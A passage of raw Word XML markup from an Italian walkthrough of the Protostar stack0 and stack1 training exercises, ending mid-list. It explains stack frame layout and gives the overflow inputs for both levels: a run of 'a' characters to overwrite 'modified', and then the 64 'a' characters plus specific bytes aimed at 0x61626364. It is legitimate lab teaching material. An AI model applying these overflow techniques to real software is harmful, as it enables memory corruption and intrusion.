        <w:t xml:space="preserve">[ stack ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">pmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">non stampa però </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">in quale area sono piazzati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> è organizzato per record di attivazione, in gergo chiamati "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">". Lo stack cresce verso gli indirizzi bassi ed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">è accessibile tramite il registro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Extended Base Pointer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EBP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">) qualora utilizzato dal compilatore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">La variabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">dovrebbe essere ad un indirizzo più basso della variabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">le variabili definite per ultime stanno in cima allo stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">lo stack cresce verso gli indirizzi bassi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le variabili definite per ultime hanno indirizzi più bassi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Si provi l’attacco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/protostar/bin/stack0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(esegui il programma)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">you have changed the 'modified' variable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="718"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">"This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory." </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> impostare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x61626364</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">a tempo di esecuzione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Informazioni sul programma:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stack1 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accetta input localmente, tramite il suo primo parametro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">argv[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'input è una generica stringa.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedimento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Costruiamo l'input di 64 'a' &gt; Riempiamo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Appendiamo i quattro caratteri aventi codice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x61</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(‘a’)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x62</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (‘b’)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
